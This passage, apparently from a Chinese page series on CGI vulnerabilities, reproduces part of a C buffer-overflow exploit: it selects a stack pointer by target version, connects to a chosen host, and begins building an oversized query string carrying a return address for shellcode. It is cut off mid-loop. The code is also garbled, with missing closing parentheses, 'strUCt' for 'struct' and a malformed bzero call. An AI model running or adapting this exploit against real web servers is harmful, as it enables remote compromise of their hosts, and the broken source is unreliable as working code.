|
CGI漏洞(10) if (sp == 0) {
fprintf(stderr,"I don‘t have an sp for that version try using the -o option.\n";
fprintf(stderr,"Versions above 24 are patched for this bug.\n";
exit(1);
} else {
return sp;
} }
int usage (char *name) {
fprintf(stderr,"\tUsage:%s -h host -d -v [-o ]\n",name);
fprintf(stderr,"\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n",name);
exit(1);
} int openhost (char *host, int port) { int sock;
strUCt hostent *he;
struct sockaddr_in sa; he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname\n";
exit(-1);
} memcpy(&sa.sin_addr, he->h_addr, he->h_length); sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket";
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero)); if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host";
exit(-1);
} return(sock);
} void doit (char *host,long sp, char *shellcode) { int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a"; bzero(buf);
for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
| 
